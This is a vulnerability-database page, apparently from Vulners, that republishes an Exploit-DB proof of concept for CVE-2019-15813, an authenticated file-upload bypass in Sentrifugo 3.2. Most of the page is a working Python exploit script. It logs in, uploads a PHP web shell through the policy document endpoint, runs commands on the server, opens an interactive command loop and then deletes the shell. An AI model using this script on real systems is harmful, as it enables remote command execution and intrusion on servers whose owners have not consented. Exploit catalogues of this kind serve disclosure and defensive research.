Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Sentrifugo 3.2 - File Upload Restriction Bypass (Authenticated)

🗓️ 27 Oct 2020 00:00:00Reported by Gurkirat SinghType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 528 Views

Sentrifugo 3.2 - File Upload Restriction Bypas

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Sentrifugo 3.2 - File Upload Restriction Bypass Vulnerability
30 Aug 201900:00
zdt
CNVD		Sentrifugo File Upload Limit Bypass Vulnerability
3 Sep 201900:00
cnvd
CVE		CVE-2019-15813
4 Sep 201913:44
cve
Cvelist		CVE-2019-15813
4 Sep 201913:44
cvelist
Exploit DB		Sentrifugo 3.2 - File Upload Restriction Bypass
30 Aug 201900:00
exploitdb
EUVD		EUVD-2019-6730
7 Oct 202500:30
euvd
exploitpack		Sentrifugo 3.2 - File Upload Restriction Bypass
30 Aug 201900:00
exploitpack
NVD		CVE-2019-15813
4 Sep 201914:15
nvd
OSV		CVE-2019-15813
4 Sep 201914:15
osv
Packet Storm		Sentrifugo 3.2 File Upload Restriction Bypass
30 Aug 201900:00
packetstorm
Rows per page
# Exploit Title: Sentrifugo 3.2 - File Upload Restriction Bypass (Authenticated)
# Date: 26/10/2020
# Exploit Author: Gurkirat Singh <[email protected]>
# Vendor Homepage: http://www.sentrifugo.com/
# POC Link: https://www.exploit-db.com/exploits/47323
# Version: 3.2
# Tested on: Linux and Windows
# CVE : CVE-2019-15813
# Contact Details: https://google.com/search?q=tbhaxor

from argparse import ArgumentParser, RawTextHelpFormatter
from bs4 import BeautifulSoup, Tag
from requests.sessions import Session
import tempfile as tmp
import os.path as path
import random
import string
from huepy import *

parser = ArgumentParser(description="Exploit for CVE-2019-15813",
                        formatter_class=RawTextHelpFormatter)
parser.add_argument("--target",
                    "-t",
                    help="target uri where application is installed",
                    required=True,
                    metavar="",
                    dest="t")
parser.add_argument("--user",
                    "-u",
                    help="username to authenticate",
                    required=True,
                    metavar="",
                    dest="u")
parser.add_argument("--password",
                    "-p",
                    help="password to authenticate",
                    required=True,
                    metavar="",
                    dest="p")
args = parser.parse_args()

if args.t.endswith("/"):
    args.t = args.t[:-1]

F = "".join(random.choices(string.ascii_letters, k=13)) + ".php"

with Session() as http:
    print(run("Logging in"))
    data = {"username": args.u, "password": args.p}

    r = http.post(args.t + "/index.php/index/loginpopupsave",
                  data=data,
                  allow_redirects=False)

    if not (r.headers.get("Location", "").endswith("welcome")
            or r.headers.get("Location", "").endswith("welcome/")):
        print(bad("Unable to login. Check username / password"))
        exit(1)
    print(good("Logged in"))

    print(run("Exploiting"))
    files = {"myfile": ("shell.php", "<?php system($_POST['cmd']); ?>")}

    r = http.post(args.t + "/index.php/policydocuments/uploaddoc", files=files)
    if r.status_code != 200:
        print(bad("Unable to upload file"))
        exit(1)
    file_name = r.json()["filedata"]["new_name"]
    print(info("Spawning shell"))

    user = http.post(args.t + "/public/uploads/policy_doc_temp/" + file_name,
                     data={"cmd": "whoami"})
    host = http.post(args.t + "/public/uploads/policy_doc_temp/" + file_name,
                     data={"cmd": "cat /etc/hostname"})
    shell = f"{lightgreen('%s@%s'%(user.content.decode().strip(), host.content.decode().strip()))}{blue('$ ')}"

    while True:
        try:
            cmd = input(shell)
            if cmd == "exit": break
            r = http.post(args.t + "/public/uploads/policy_doc_temp/" +
                          file_name,
                          data={"cmd": cmd})
            print(r.content.decode().strip())
        except Exception as e:
            print()
            break

    print(run("Cleaning"))
    http.post(args.t + "/public/uploads/policy_doc_temp/" + file_name,
              data={"cmd": "rm %s" % file_name})
    r = http.get(args.t + "/public/uploads/policy_doc_temp/" + file_name)
    if r.status_code == 404:
        print(good("Cleaned"))
    else:
        print(bad("Unable to clean the file"))

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
27 Oct 2020 00:00Current
8.8High risk
Vulners AI Score8.8
CVSS 26.5
CVSS 3.18.8
EPSS0.04186
exploitsentrifugofile uploadrestriction bypassauthenticatedcve-2019-15813linuxwindowspocvendorversion 3.2securityvulnerability
528